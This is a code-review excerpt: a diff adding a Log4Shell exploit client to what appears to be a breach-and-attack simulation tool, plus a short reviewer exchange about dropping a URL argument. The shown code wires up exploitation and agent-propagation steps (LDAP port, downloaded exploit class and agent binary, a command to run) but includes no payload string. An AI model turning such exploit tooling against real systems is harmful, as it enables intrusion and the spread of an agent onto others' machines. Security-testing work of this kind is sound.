monkey/agent_plugins/exploiters/log4shell/src/log4shell_exploit_client.py

```diff
@@ -0,0 +1,218 @@
+import logging
+from time import sleep, time
+from typing import Set, Tuple
+
+from common.agent_events import ExploitationEvent, PropagationEvent
+from common.event_queue import IAgentEventPublisher
+from common.tags import (
+    BRUTE_FORCE_T1110_TAG,
+    EXPLOITATION_FOR_CLIENT_EXECUTION_T1203_TAG,
+    INGRESS_TOOL_TRANSFER_T1105_TAG,
+)
+from common.types import AgentID, Event, NetworkPort
+from infection_monkey.i_puppet import TargetHost
+from infection_monkey.network.tools import get_interface_to_target
+from infection_monkey.utils.threading import interruptible_iter
+
+from .log4shell_options import Log4ShellOptions
+from .log4shell_utils import get_log4shell_service_exploiters
+
+logger = logging.getLogger(__name__)
+
+LOG4SHELL_EXPLOITER_TAG = "log4shell-exploiter"
+VICTIM_WAIT_SLEEP_TIME_SEC = 0.050
+EXPLOITER_TAGS = (
+    LOG4SHELL_EXPLOITER_TAG,
+    BRUTE_FORCE_T1110_TAG,
+    EXPLOITATION_FOR_CLIENT_EXECUTION_T1203_TAG,
+)
+PROPAGATION_TAGS = (
+    LOG4SHELL_EXPLOITER_TAG,
+    EXPLOITATION_FOR_CLIENT_EXECUTION_T1203_TAG,
+    INGRESS_TOOL_TRANSFER_T1105_TAG,
+)
+
+
+class Log4ShellExploitClient:
+    def __init__(
+        self, exploiter_name: str, agent_id: AgentID, agent_event_publisher: IAgentEventPublisher
+    ):
+        self._exploiter_name = exploiter_name
+        self._agent_id = agent_id
+        self._agent_event_publisher = agent_event_publisher
+
+    def exploit(
+        self,
+        target_host: TargetHost,
+        options: Log4ShellOptions,
+        ldap_port: NetworkPort,
+        agent_binary_downloaded: Event,
+        exploit_class_downloaded: Event,
+        url: str,
+        command: str,
+        ports_to_try: Set[NetworkPort],
+        interrupt: Event,
+    ) -> Tuple[bool, bool]:
+        exploitation_success = False
+        propagation_success = False
+        try:
+            exploitation_success, propagation_success = self._run_exploit(
+                target_host,
+                command,
+                options,
+                ldap_port,
+                agent_binary_downloaded,
+                exploit_class_downloaded,
+                ports_to_try,
+                interrupt,
+            )
+            exploitation_message = "" if exploitation_success else f"Failed to exploit via {url}"
```

Comment:
Add the URL to the exploitation message even if it was successful.

Reply:
On second thought, we should get rid of the `url` argument in this function. It's already being logged in the exploiter before this is called.